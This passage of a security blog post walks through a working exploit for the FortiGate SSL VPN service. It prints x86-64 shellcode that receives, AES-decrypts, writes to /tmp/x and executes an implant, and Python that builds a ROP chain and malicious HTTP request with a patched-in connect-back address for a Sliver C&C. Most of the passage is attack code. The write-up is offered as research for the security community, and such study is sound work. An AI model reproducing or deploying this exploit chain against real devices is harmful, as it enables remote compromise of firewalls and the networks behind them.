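The same read-until-complete pattern, written in Python for clarity, looks like the sketch below. recv_exact is a hypothetical helper name; it treats a zero-byte read (the peer closed the connection) as a failure, a case any raw recvfrom loop also has to handle to avoid spinning forever, and it lets socket errors propagate as OSError.

```python
import socket


def recv_exact(sock: socket.socket, size: int) -> bytes:
    """Read exactly `size` bytes, looping until everything has arrived."""
    buf = bytearray(size)        # plays the role of the calloc()'d buffer
    view = memoryview(buf)
    total = 0                    # running count of bytes received
    while total < size:
        n = sock.recv_into(view[total:], size - total)  # raises OSError on error
        if n == 0:
            raise ConnectionError(f"peer closed after {total} of {size} bytes")
        total += n
    return bytes(buf)


if __name__ == "__main__":
    a, b = socket.socketpair()
    a.sendall(b"hello ")
    a.sendall(b"world")
    print(recv_exact(b, 11))  # prints: b'hello world'
    a.close()
    b.close()
```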
Once the entire encrypted data blob was read, the shellcode wrote an "all clear" message to the exploit to let it know what stage it had reached:
    # we have finished reading the payload.
    # write(2) goodbye response to the stager.
    movq %rsp, %rsi                    # source buffer is in rsi
    addq $0x8, %rsi                    # clobber the start of the shellcode nop sled, who cares
    movabs $0x3838383838383838, %rax
    movq %rax, (%rsi)                  # response contains whatever the exploit patched in here
    movq %rbx, %rdi                    # socket fd -> rdi
    movq $0x8, %rdx                    # payload len = 8 bytes
    movq $0x1, %rax                    # write(2)
    syscall
The socket was then closed, since we no longer needed to talk to the exploit. From here on, the shellcode ran autonomously.
    # close the socket
    movq %rbx, %rdi      # socket fd -> rdi
    movq $0x3, %rax      # close(2)
    syscall              # close the socket
This piece of code took the randomly generated AES key (which, like most other things, is patched into the shellcode at runtime) and used it to decrypt the blob we just received from the exploit:
    # at this point we have the encrypted payload in memory. R12 is a pointer.
    # create another pointer:
    # r14 -> buffer for decrypted payload (re-use the encrypted buffer!)
    movq %r12, %r14
    # r15 -> AES_key struct (244 bytes, but allow more)
    movq %rsp, %rdx
    subq $0x200, %rdx
    movq %rdx, %r15
    # r10 -> actual AES key (16 bytes)
    subq $0x10, %rdx
    movq %rdx, %r10
    # r11 -> iv
    subq $0x10, %rdx
    movq %rdx, %r11
    # reminder of things in callee-saved regs at this stage:
    # r12 = ptr to encrypted payload
    # r13 = length of encrypted payload
    # r14 = ptr to buffer for decrypted payload
    # r15 = OpenSSL AES_key struct
    # and caller-saved:
    # r10 = AES key
    # r11 = iv
    # These placeholders will be patched by the exploit at runtime.
    # The patched bytes are a one-time-use 128-bit AES key used by the exploit
    # to encrypt the payload we just received. We'll decrypt it next.
    # First, let's store the 16-byte key on the stack.
    movabs $0x3030303030303030, %rax
    movq %r10, %rdx
    movq %rax, (%rdx)
    movabs $0x3131313131313131, %rax
    movq %rax, 0x8(%rdx)
    # put an all-zero IV adjacent to the AES key on the stack
    movabs $0x0, %rax
    movq %r11, %rdx
    movq %rax, (%rdx)
    movq %rax, 0x8(%rdx)
    # setup and call OpenSSL's AES_set_decrypt_key()
    movq %r10, %rdi                    # ptr to AES key bytes
    movq $0x80, %rsi                   # 128 (0x80) bits
    movq %r15, %rdx                    # AES_key struct address
    movabs $0x3333333333333333, %rax   # replaced at runtime with the real PLT address
    movq %rax, %rcx                    # address of AES_set_decrypt_key()
    movq %rsp, %rbx
    addq $0x4000, %rsp
    callq *%rcx
    movq %rbx, %rsp
    # setup and call OpenSSL's AES_cbc_encrypt()
    movq %r12, %rdi                    # encrypted data
    movq %r14, %rsi                    # buffer for decrypted data
    movq %r13, %rdx                    # encrypted data length
    movq %r15, %rcx                    # OpenSSL AES_key struct
    movq %r15, %r8
    subq $0x20, %r8                    # iv
    movq $0x0, %r9                     # AES_DECRYPT
    movabs $0x3434343434343434, %rax   # AES_cbc_encrypt()
    movq %rsp, %rbx
    addq $0x4000, %rsp
    callq *%rax
    movq %rbx, %rsp
At this point, the implant had been decrypted in memory, so it was time to write it to disk:
    # write the cleartext payload to disk
    # open("/tmp/x", O_CREAT | O_RDWR, 0777)
    movabs $0x00782f706d742f, %rax     # /tmp/x\x00
    movq %rsp, %rdi                    # stack ptr -> rdi
    subq $0x8, %rdi                    # we'll place filename at rsp-8
    movq %rax, (%rdi)                  # store filename on stack at rsp-8
    movq $0x42, %rsi                   # O_CREAT | O_RDWR
    movq $0x1ff, %rdx                  # 0777 & ~umask (e.g. 0755 with umask 022) = executable by all
    movq $0x2, %rax                    # open(2)
    syscall                            # open("/tmp/x", O_CREAT | O_RDWR, 0777);
    # write(payload) to "/tmp/x"
    # The value 0x3232323232323232 will be patched at runtime by the exploit and
    # contains the real length of the payload, not the padded length used for AES CBC.
    movq %rax, %rdi                    # /tmp/x fd -> rdi
    movq %rax, %r13                    # save a copy of the fd
    movq %r14, %rsi                    # decrypted payload address -> rsi
    movabs $0x3232323232323232, %rax   # payload len -> rdx
    movq %rax, %rdx
    movq $0x1, %rax                    # write(2)
    syscall                            # write payload to /tmp/x
    # close "/tmp/x"
    movq %r13, %rdi                    # file fd -> rdi
    movq $0x3, %rax                    # close(2)
    syscall                            # close the /tmp/x file descriptor
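Two of the magic numbers above are easy to check by hand. This Python sketch is our own; the O_* values are the Linux x86_64 constants written out as assumptions (rather than read from the os module, whose values differ on other platforms). It shows how "/tmp/x" becomes the movabs immediate and how 0x42 and 0x1ff decode.

```python
# Linux x86_64 values, written out here as assumptions rather than taken from os
O_RDWR = 0o2
O_CREAT = 0o100


def str_to_imm64(s: bytes) -> int:
    """Pack up to 7 bytes plus a NUL terminator into a movabs immediate."""
    if len(s) > 7:
        raise ValueError("string plus NUL must fit in 8 bytes")
    return int.from_bytes(s.ljust(8, b"\x00"), "little")


def effective_mode(mode: int, umask: int) -> int:
    """Permissions a newly created file actually gets: mode & ~umask."""
    return mode & ~umask


if __name__ == "__main__":
    print(hex(str_to_imm64(b"/tmp/x")))          # prints: 0x782f706d742f
    print(hex(O_CREAT | O_RDWR))                 # prints: 0x42
    print(oct(effective_mode(0x1FF, 0o022)))     # prints: 0o755
```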
The last stage was to execute the payload via the execve syscall:
    # call execve()
    movabs $0x00782f706d742f, %rax     # /tmp/x\x00
    movq %rax, (%r12)                  # "/tmp/x\x00" into mem @ r12 (same buffer as r14)
    movq %r12, %rdi                    # address of /tmp/x into rdi
    movq $0x0, %rsi                    # argv = NULL
    movq $0x0, %rdx                    # envp = NULL
    movq $0x3b, %rax                   # execve syscall
    syscall
We're good netizens, so the shellcode ends with a clean exit rather than a crash (this code only runs if execve fails, since a successful execve replaces the process image). The FortiGate firewall has a watchdog that restarts dead processes automatically, and things tidy themselves up after this part is complete.
_final:
    # call _exit()
    # exit cleanly. The watchdog restarts sslvpnd.
    movq $0xe7, %rax     # exit_group(2)
    xorq %rdi, %rdi      # exit status 0
    syscall
####### EOF is never reached ########
A Quick Recap
At this stage we've covered:
- The bug
- The PoC / trigger
- The stages of the exploit
- Obtaining the necessary addresses
- A little bit on ROP
- Writing shellcode
The glue that held all this together is the ROP chain. We used a lightweight Python class to simplify the construction of the ROP chain.
Create a ROP Chain
Take a look at how we built a ROP chain:
import struct
from subprocess import run

rop.clear_gadget_chain()
req = bytearray(b"")
req += (b"POST /remote/logincheck?magic=aaa HTTP/1.1\r\nHost: " + self.host.encode() + b":" + str(self.port).encode()
        + b"\r\nContent-Length: " + CONTENT_LENGTH
        + b"\r\nUser-Agent: AAAAAAAAAAAAAAAA\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n\r\n")

# Just padding the start of the ROP buffer
rop.add_padding(HEAD_PAD_LENGTH-2)  # this is of no consequence

# Stage 2 - The stack pivot gadget dumps us here.
# Stage 2.5 - "slide" down the stack by popping RETs,
# then hit an "add rsp, 0x18" to add 0x18 (24) bytes to $rsp.
# We do this to "jump over" the stack pivot gadget and land in ~100kb of space that we control.
# Not all platforms will give us an "add rsp, 0x18" gadget, but we might get "add rsp, xxx", so
# we use RET to get us right up to the pivot and then jump over it using whatever gadget we can.
# We land in another RET sled to account for not knowing the jump size in advance.
rop.add_gadget("ret;", 23)
rop.add_gadget("add rsp, 0x18; ret;")

# Stage 1 - Entry point of the ROP chain.
#
# The exploit sets $rip to the address of STACK_PIVOT_GADGET then RETs to stage 2, above.
# This part will be jumped over by stage 2.5, above.
rop.add_gadget("push rdx; adc byte [rbx + 0x41], bl; pop rsp; pop rbp; ret;")  # Entry point: overwrite rip with the stack pivot gadget.

# Stage 3 - RET sled
#
rop.add_gadget("ret;", 32)  # RET sled consists of 32 RET instructions

# Stage 4 - Calculate aligned memory page for stack address
rop.add_gadget("pop rax; ret;")
rop.add_immediate(0xfffffffffffff000)
rop.add_gadget("and rax, rdi; ret;")
rop.add_gadget("pop rbx; ret;")
rop.add_gadget("add rsp, 0x18; ret;")
rop.add_gadget("mov rdi, rax; call rbx;")
rop.add_gadget("ret;", 8)
rop.add_gadget("pop rsi; ret;")
rop.add_immediate(MEM_LEN)
rop.add_gadget("pop rdx; ret;")
rop.add_immediate(PROT_RWX)
rop.add_gadget("pop rax; ret;")
rop.add_gadget("mprotect")
rop.add_gadget("jmp rax;")

# Stage 7 - NOP/RET sled, then JMP to stack address.
# At this point our ROP payload/stack is executable. Shellcode follows.
rop.add_gadget("ret;", 8)
rop.add_gadget("jmp rsp;")
rop.add_immediate(0x9090909090909090, 8)

# build and convert the shellcode
# run(['as', '-o', 'shellcode.o', 'shellcode.s'], check=True)
result = run("objdump -d -M intel shellcode.o |egrep '^...[a-z0-9]:' |cut -c 7-28|tr -d '\\n'|tr -d ' '|tr -d '\\t'|xxd -r -p", shell=True, capture_output=True)
shellcode = result.stdout

# patch in the relevant AES key for payload decryption
shellcode = shellcode.replace(b"00000000", self.AES_key[0:8])
shellcode = shellcode.replace(b"11111111", self.AES_key[8:16])
# we need to know the real length of the payload file before padding
shellcode = shellcode.replace(b"22222222", struct.pack("<Q", self.payload_length))
# fix up PLT function addresses in the shellcode
shellcode = shellcode.replace(b"33333333", struct.pack("<Q", rop.get_address("AES_set_decrypt_key")))
shellcode = shellcode.replace(b"44444444", struct.pack("<Q", rop.get_address("AES_cbc_encrypt")))
shellcode = shellcode.replace(b"55555555", struct.pack("<Q", rop.get_address("calloc")))
# patch in the model # of the device we're brute-forcing so that the ping-back tells us
# which payload worked
null_len = 8 - len(hw_version)  # assumption breaks if strlen(hw_version) > 7
patch = hw_version + "\x00"*null_len
shellcode = shellcode.replace(b"88888888", patch.encode())
# patch in the operator's IP
shellcode = shellcode.replace(b"XXXXXX", struct.pack(">H", self.connectBackPort) + self.ip_as_bytes(self.connectBackHost))
# shellcode gets tacked onto the end of the 8-byte NOP sled
rop.add_bytes(shellcode)
# sprinkle liberally with 4MB of padding
rop.add_padding(PADDING_LEN)
req += rop.bytes()
You can see that we tried to make it simple to build the ROP chain using methods like add_gadget and add_immediate, which make it easy to add ROP gadgets and 8-byte little-endian immediate values.
The general gist of this code is that the buffer req is populated with:
- HTTP request
- HTTP POST body containing the trigger for the exploit (malicious Content-Length header)
- New function pointer address that points at our stack pivot gadget
- ROP chain
- Shellcode
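The post doesn't show the ROP helper class itself. As a rough idea of what add_gadget and add_immediate have to do, here is a minimal hypothetical version: RopChain, its address table, and the "A" padding byte are our own illustration, and a real builder would resolve gadget names to addresses found with a tool like ropr for each firmware build.

```python
import struct


class RopChain:
    """A hypothetical, minimal ROP chain builder (not the one used in the post)."""

    def __init__(self, addresses: dict):
        self.addresses = addresses     # gadget or PLT name -> address
        self.chain = bytearray()

    def clear_gadget_chain(self) -> None:
        self.chain.clear()

    def add_gadget(self, name: str, count: int = 1) -> None:
        addr = self.addresses[name]    # KeyError if the gadget is unknown
        self.chain += struct.pack("<Q", addr) * count

    def add_immediate(self, value: int, count: int = 1) -> None:
        self.chain += struct.pack("<Q", value) * count

    def add_padding(self, length: int, fill: bytes = b"A") -> None:
        self.chain += fill * length

    def add_bytes(self, data: bytes) -> None:
        self.chain += data

    def get_address(self, name: str) -> int:
        return self.addresses[name]

    def bytes(self) -> bytes:
        return bytes(self.chain)       # the builtin bytes(), not this method


if __name__ == "__main__":
    rop = RopChain({"ret;": 0x401000, "pop rsi; ret;": 0x402000})
    rop.add_gadget("ret;", 2)
    rop.add_gadget("pop rsi; ret;")
    rop.add_immediate(0x5000)
    print(rop.bytes().hex())
```

Keeping the per-firmware addresses in one table is what lets the same chain-building code target several FortiOS builds: only the table changes.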
Having completed the exploit payload, we sent the req buffer to the SSL VPN's HTTP service. This triggered the bug immediately, causing the service to run the shellcode, download the implant, and connect the Sliver agent to our C&C infrastructure.
Conclusion
We hope this blog offers a unique perspective that shares the rough outlines of how to create an exploit for a single software/hardware version of FortiGate. Our goal is to add deeper layers of analysis to the existing resources in the security community that are mentioned above. We look forward to sharing additional analysis techniques from continued discovery efforts against FortiGate security appliances in the future.